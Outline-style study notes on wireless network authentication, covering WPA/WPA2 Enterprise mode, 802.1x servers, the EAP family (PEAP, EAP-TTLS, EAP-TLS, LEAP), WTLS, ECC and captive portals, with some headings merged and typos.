Personal Versus Enterprise Modes (WPA and WPA2 Enterprise mode (Both…
Personal Versus Enterprise Modes
WPA and WPA2 Enterprise mode
Both operate in either Personal or Enterprise modes
forces users to authenticate with unique credentials before granting them access
Enterprise mode uses an 802.1x server, often implemented as a RADIUS server, which accesses a database of accounts.
802.1x server has a certificate on it to secure the authentication process.
Regular WEP & WPA users access the wireless network anonymously with a Preshared key (PSK)
EAP, PEAP, and LEAP
The Extensible Authentication Protocol (EAP)
An authentication framework that provides general guidance for authentication methods.
802.1x servers typically use one of these methods(EAP,PEAP,LEAP) to increase the level of security during the authentication process.
Extensible Authentication Protocol (EAP)
provides a method for two systems to create a secure encryption key, also known as a Pairwise Master Key (PMK).
Systems then use this key to encrypt all data transmitted between the devices
Both TKIP or AES-based CCMP use this key
Protected EAP (PEAP)
PEAP protects the channel, as designer thought EAP will have physical security
encapsulates and encrypts the EAP conversation in a Transport Layer Security (TLS) tunnel
PEAP requires a certificate on the server,but not the clients. A
common implementation is with Microsoft Challenge Handshake Authentication Protocol version 2 (MS-CHAPv2).
EAP-Tunneled TLS (EAP-TTLS)
This is an extension of PEAP
allowing systems to use some older authentication methods such as Password Authentication Protocol (PAP)
It requires a certificate on the 802.1x server but not the clients.
This is one of the most secure EAP standards and is widely implemented
Requires certificates on the 802.1x
server and on each of the wireless clients.
Lightweight EAP (LEAP)
Cisco created LEAP using a modified version of the Challenge Handshake Authentication Protocol (CHAP)
does not require a digital certificate.
Most wireless devices support LEAP,
Cisco recommends using stronger protocols, instead of LEAP.
Note that PEAP, EAP-TTLS, and EAP-TLS all use digital certificates. certificates help provide strong authentication and encryption services. However, a certificate authority (CA) must issue certificates, so an organization must either purchase certificates from a public CA, or implement a private CA within the network.
WTLS and ECC
Wireless Transport Layer Security (WTLS)
WTLS is a wireless implementation of TLS
elliptic curve cryptography (ECC)
Many smaller wireless devices use WTLS or ECC
Smaller wireless devices such as PDAs and cell phones don’t have the same processing power as servers and desktop ,can't handle protocols liek WPA2
forces clients using web browsers to complete a specific process before it allows them access to the network.
Free Internet access.
Paid Internet access.
Adding an 802.1x server can be expensive and is sometimes not a feasible option. Organizations can use captive portals as an alternative. It requires users to authenticate before granting them access.